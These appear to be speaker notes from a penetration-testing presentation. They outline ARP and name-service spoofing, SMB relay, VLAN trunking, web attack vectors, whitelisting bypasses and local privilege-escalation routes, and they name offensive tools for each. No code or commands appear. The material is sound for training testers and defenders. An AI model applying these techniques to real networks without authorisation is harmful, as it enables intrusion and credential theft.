  • #7 These are protocols that are commonly targeted. However, there are many others:Address Resolution Protocol (ARP): Cain, ettercap, interceptor-ng, Subterfuge, easycredsNetBIOS Name Service (NBNS): MetaSploit and responder Link-local Multicast Name Resolution (LLMNR): MetaSploit and responder Pre-Execution Environment (PXE): MetaSploitDynamic Trunking Protocol (DTP): Yersinia Spanning-Tree Protocol (STP): Yersinia, ettercap (lamia plugin) Hot Stand-by Router Protocol (HSRP): Yersinia Dynamic Host Configuration Protocol (DHCP): Interceptor, MetaSploit, manual setup Domain Name Services (DNS): MetaSploit, ettercap, dsniff, zodiac, ADMIdPackVLAN Tunneling Protocol (VTP): Yersinia, voiphopper, or modprobe+ifconfig
  • #8 Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • #9 Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • #10 Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • #11 Go with what you like. 
  • #12 Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • #13 Windows Protocol- Kind of like a back up to DNS- Host file- DNS- NBNSRace condition Limited to broadcast network
  • #17 Go with what you like. http basichttp_ntlmauthhttp_relaysmb
  • #18 Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • #19 In summary, an SMB Relay attack can be loosely defined as the process of relaying SMB authentication from one system to another via a man-in-the-middle (MITM) position. Based on my five whole minutes of wiki research I now know that the issues that allow smb attacks to be succesful were identified as a threat in the late 90’s. However, it wasn’t until 2001 that Sir Dystic publicly released a tool that could be used to perform practical attacks. Seven years later Microsoft got around to partially fixing the issue with a patch, but it only prevents attackers from relaying back to the originating system.I guess the good news is that SMB relay attacks can be prevented by enabling and requiring smb message signing, but the bad news is that most environments are configured in such a way that attackers can still relay authentication to other systems.2001 was a while ago, so I got out my calculator and did some hardcore math to figure out that this has been a well known and practiced attack for at least 11 years. During that time there have been many tools and projects dedicated to taking advantage of the attack technique. Some of the more popular ones include Metasploit, Squirtle, and ZackAttack.Anyway, let’s get back on track…
  • #20 Image showing MITM
  • #22 Go with what you like. http basichttp_ntlmauthhttp_relaysmb
  • #23 Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • #24 In summary, an SMB Relay attack can be loosely defined as the process of relaying SMB authentication from one system to another via a man-in-the-middle (MITM) position. Based on my five whole minutes of wiki research I now know that the issues that allow smb attacks to be succesful were identified as a threat in the late 90’s. However, it wasn’t until 2001 that Sir Dystic publicly released a tool that could be used to perform practical attacks. Seven years later Microsoft got around to partially fixing the issue with a patch, but it only prevents attackers from relaying back to the originating system.I guess the good news is that SMB relay attacks can be prevented by enabling and requiring smb message signing, but the bad news is that most environments are configured in such a way that attackers can still relay authentication to other systems.2001 was a while ago, so I got out my calculator and did some hardcore math to figure out that this has been a well known and practiced attack for at least 11 years. During that time there have been many tools and projects dedicated to taking advantage of the attack technique. Some of the more popular ones include Metasploit, Squirtle, and ZackAttack.Anyway, let’s get back on track…
  • #26 Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • #28 the unauthorized switch can send DTP frames and form a trunk with the Company Switch. If the attacker can establish a trunk link to the Company switch, it receives traffic to all VLANs through the trunk because all VLANs are allowed on a trunk by default.
  • #29 Image showing MITM
  • #30 Image showing MITM
  • #31 Image showing MITM
  • #32 Image showing MITM
  • #37 Touch on common tools and pitfalls (account lockouts)
  • #45 Default and weak passwords for everythingTools: Nmap, Nessus, Web Scour, Manuals, GoogleSQL injectionTools: Manually, web scanners, SQL Ninja, SQL Map, MetasploitRFI/Web Shells (JBOSS, Tomcat, etc.)Tools: Metasploit, Fuzzdb, and other web shelleryWeb directory traversalsTools: Manually, web scanners, Fuzzdb, Metasploit, Critical Missing Patches (SEP etc)Tools: Metasploit, exploitdb exploits, etc
  • #49 Execution via approved apps - Powershell Code Injection - Rundll32 - IEExecDirectory Exceptions - GACDisable ServicesPoisoning allowed file list and blocking updates via hosts filePoisoning updates
  • #51 This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  • #52 Localuser  Local AdministratorExcessive local group privileges (admin or power users)Cleartext credentialsSysprep (unattend.xml/ini/txt)Config files, scripts, logs, desktop foldersTech support calls filesWeak application configurations that allow: Restarting or reconfiguring servicesReplacing application files DLL pre or side loading Executable injection via poorly registered services C:\Program Files (x86) vs “C:\Program Files (x86)” Local and remote exploits (Metasploit: getsystem)
  • #53 This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  • #54 This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  • #55 This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  • #56 Yes it did.